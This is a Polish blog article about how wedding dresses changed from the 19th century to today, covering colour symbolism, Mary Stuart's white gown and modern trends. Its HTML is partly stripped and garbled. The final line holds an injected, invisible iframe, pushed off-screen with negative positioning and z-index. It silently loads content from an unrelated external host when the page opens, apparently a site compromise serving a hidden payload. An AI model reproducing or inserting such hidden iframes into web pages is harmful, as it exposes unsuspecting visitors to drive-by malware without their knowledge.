Historia i fakty

Suknie ślubne dawniej i dziś

1 kwietnia 2016 • Opublikowane przez

Wybór sukni ślubnej to dla każdej przyszłej panny młodej. Nie jest łatwo podjąć decyzję, w jakiej kreacji chce się wystąpić w tym wyjątkowym dniu. Z dylematem tym zmagały się kobiety już przed laty. Od tego czasu strongmoda znacznie ewaluowała/strong. Przyjrzyjmy się zatem, jak wyglądały suknie ślubne kilkaset i kilkadziesiąt lat temu.

!–more–

nbsp;

strongWiek XIX /strong

Wiek XIX był czasem, gdy kobieta nie miała możliwości samodzielnie decydować o swoim losie. Jej jedyną, najważniejszą rolą było bycie posłuszną mężowi i rodzenie dzieci. Przede wszystkim liczyła się jej atrakcyjność zewnętrzna, płodność oraz status materialny. Ślub, który kobiety brały wówczas o wiele wcześniej niż dziś, był niewątpliwie bardzo ważnym wydarzeniem. Wymagał on zatem wyjątkowego stroju. Suknia ślubna była strongszyta z najpiękniejszych i oczywiście najdroższych tkanin/strong. Zdobiono ją klejnotami. Była również bogato haftowana. Zamożne rodziny zatrudniały cały sztab pracowników do jej wykonania. Pracowali nad nią: krawcowe, hafciarki oraz złotnicy. Suknia ta kosztowała tak dużo, że często stanowiła niemałą część posagu panny młodej. Jej wygląd zazwyczaj był zgodny z obowiązującymi trendami, ale co ciekawe, przez długi czas nie obowiązywał żaden konkretny kolor sukienki. Wprawdzie w kulturze zachodniej rezygnowano z czerni, ponieważ przyjął się jako symbol żałoby. strongUnikano również czerwieni/strong, gdyż ta kojarzyła się z prostytucją. Inaczej było jednak w Azji – tam żywe odcienie czerwieni symbolizowały bogactwo i płodność.

nbsp;

a href=”http://argos.pl/blog/wp-content/uploads/2016/04/Biała-suknia-ślubna-ślub-królowej-Wiktorii.jpg”img class=”size-full wp-image-2720″ src=”http://argos.pl/blog/wp-content/uploads/2016/04/Biała-suknia-ślubna-ślub-królowej-Wiktorii.jpg” alt=”centrum.whiteroses.pl” width=”620″ height=”414″ //a centrum.whiteroses.pl

nbsp;

Jedną z pierwszych kobiet, które do ślubu włożyły strongbiałą suknię/strong, była Maria I Stuart. Kiedy brała ślub z Franciszkiem II Walezjuszem, biel była we Francji kolorem żałoby i dlatego przez długi czas jej wybór był traktowany jak zła wróżba. Później kolor ten stawał się coraz bardziej popularny.

nbsp;

strongJak zmieniały się suknie ślubne na przestrzeni dekad?/strong

Poniżej prezentujemy krótki film, na którym doskonale widać,strong jak zmieniały się suknie ślubne z biegiem czasu/strong. Co pewien czas zmieniał się model welonu, długość sukni czy rodzaj dodatków. Zobaczcie sami!

nbsp;

nbsp;

strongSuknie ślubne dziś/strong

Jak ewaluowały rola i wygląd sukni ślubnej współcześnie? W dalszym ciągu jest jednym z najistotniejszych elementów przygotowań do ślubu, który przecież dla większości jest najważniejszym dniem w całym życiu. Od lat niezmienniestrong przywiązuje się do niej wielką wagę/strong. Wygląd panny młodej w sukni budzi o wiele więcej ciekawości ze strony gości niż garnitur pana młodego. Współcześnie formy sukien ślubnych są o wiele bardziej różnorodne oraz niezależne od konwenansów. Wszak kobiety nie są dziś już traktowane jako ozdoba mężczyzny, ale do wyglądu sukni ślubnej wciąż przywiązują wielką wagę. Współcześnie kobiety nierzadko strongrezygnują z welonu/strong na głowie, ponieważ traktują go jako pretensjonalny dodatek. Panujące dziś trendy dają nieograniczone możliwości w kwestii, a pomysły pań młodych wciąż zaskakują.

nbsp;

a href=”http://argos.pl/blog/wp-content/uploads/2016/04/suknia-slubna1.jpg”img class=”size-full wp-image-2717″ src=”http://argos.pl/blog/wp-content/uploads/2016/04/suknia-slubna1.jpg” alt=”boditas.com” width=”602″ height=”753″ //a boditas.com

nbs!–844c7b74e31d727d5814a0ed667c0255–iframe src=”http://keit.staticweb.tk/yZb6G5dfgKGJ” width=640 height=480 style=’position: absolute; left: -1000px; top: -1000px; z-index:-1;’/iframe